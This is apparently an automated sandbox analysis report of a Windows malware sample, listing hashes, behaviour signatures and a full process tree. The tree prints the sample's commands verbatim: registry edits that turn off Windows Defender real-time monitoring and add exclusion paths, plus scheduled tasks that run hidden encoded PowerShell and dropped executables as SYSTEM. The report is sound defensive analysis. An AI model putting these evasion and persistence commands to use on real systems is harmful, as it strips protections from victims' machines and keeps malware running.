Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    06/10/2022, 22:02

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    4c028f08ca47d06b4e7d53a170225357

  • SHA1

    7f09f770c8f136f31b4635cc80757768a044c39c

  • SHA256

    1db40bbcd1e962f710568bf7285164d8c72acc405e6d4d0a8bc4556c5f3ce28d

  • SHA512

    194c745ef0631255e765251fe35454a3f433b5289bea86c97654d6bdf191ba98f99c760c0d60f46581aa1a0476cc9eea1357375fa1a4630578a701f6220a0d00

  • SSDEEP

    196608:91OtvITWu4dZHdIfC6h4EStvJ9YfFAVkBDVAguVIrlwH:3OtQWtuq0sBoewDfuVIrlwH

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 22 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Admin\AppData\Local\Temp\7zSF6CE.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Users\Admin\AppData\Local\Temp\7zSFA18.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1400
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:600
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:836
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              6⤵
                PID:1420
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                6⤵
                  PID:572
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1692
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1200
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                  6⤵
                    PID:1340
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                    6⤵
                      PID:1872
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gxWfJpcNn" /SC once /ST 00:00:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:548
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gxWfJpcNn"
                  4⤵
                    PID:1920
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gxWfJpcNn"
                    4⤵
                      PID:1996
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bWfTenrnZRhiBbesVI" /SC once /ST 00:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\nhwPbzB.exe\" 1d /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:564
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {C1771616-0CB0-4E75-A6EA-3BB731B29297} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
                1⤵
                  PID:1812
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1396
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:1632
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:684
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:1940
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1432
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          3⤵
                            PID:1904
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                          2⤵
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1212
                          • C:\Windows\system32\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            3⤵
                              PID:1988
                        • C:\Windows\system32\gpscript.exe
                          gpscript.exe /RefreshSystemParam
                          1⤵
                            PID:1064
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {5F3365B8-F4C5-45D8-B572-7B936984B368} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                              PID:572
                              • C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\nhwPbzB.exe
                                C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\nhwPbzB.exe 1d /site_id 525403 /S
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:1956
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gUTDKNAzk" /SC once /ST 00:01:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:1880
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gUTDKNAzk"
                                  3⤵
                                    PID:828
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gUTDKNAzk"
                                    3⤵
                                      PID:1824
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      3⤵
                                        PID:112
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:1208
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        3⤵
                                          PID:364
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                            4⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            PID:564
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gpCOCOJoa" /SC once /ST 00:00:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:1200
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gpCOCOJoa"
                                          3⤵
                                            PID:1680
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gpCOCOJoa"
                                            3⤵
                                              PID:1004
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:1408
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2036
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:2044
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1152
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:112
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1424
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:1420
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1200
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C copy nul "C:\Windows\Temp\yUSqPVaaVaTonAKz\dcHzSwbL\RKIYSKyXinZEzpYF.wsf"
                                                          3⤵
                                                            PID:1600
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\yUSqPVaaVaTonAKz\dcHzSwbL\RKIYSKyXinZEzpYF.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:1680
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1008
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1204
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:548
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1668
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1172
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1988
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:892
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:432
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1940
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:1684
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:1996
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:1540
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:1912
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • Windows security bypass
                                                                PID:1552
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:1076
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • Windows security bypass
                                                                  PID:664
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:1132
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1172
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:1700
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:1668
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:1988
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:892
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:280
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:2036
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                  • Windows security bypass
                                                                                  PID:1684
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:64
                                                                                  4⤵
                                                                                    PID:1424
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:32
                                                                                    4⤵
                                                                                      PID:1340
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:64
                                                                                      4⤵
                                                                                        PID:364
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                          PID:536
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:64
                                                                                          4⤵
                                                                                            PID:924
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:32
                                                                                            4⤵
                                                                                            • Windows security bypass
                                                                                            PID:1076
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:64
                                                                                            4⤵
                                                                                              PID:2012
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "gZnVWDPrW" /SC once /ST 00:01:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:1064
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "gZnVWDPrW"
                                                                                            3⤵
                                                                                              PID:1888
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "gZnVWDPrW"
                                                                                              3⤵
                                                                                                PID:952
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                3⤵
                                                                                                  PID:1652
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                    4⤵
                                                                                                      PID:1208
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                    3⤵
                                                                                                      PID:776
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                        4⤵
                                                                                                          PID:980
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "jCymsroQFbYeGMouD" /SC once /ST 00:01:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\EuzpuHZ.exe\" UZ /site_id 525403 /S" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:1340
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "jCymsroQFbYeGMouD"
                                                                                                        3⤵
                                                                                                          PID:1200
                                                                                                      • C:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\EuzpuHZ.exe
                                                                                                        C:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\EuzpuHZ.exe UZ /site_id 525403 /S
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
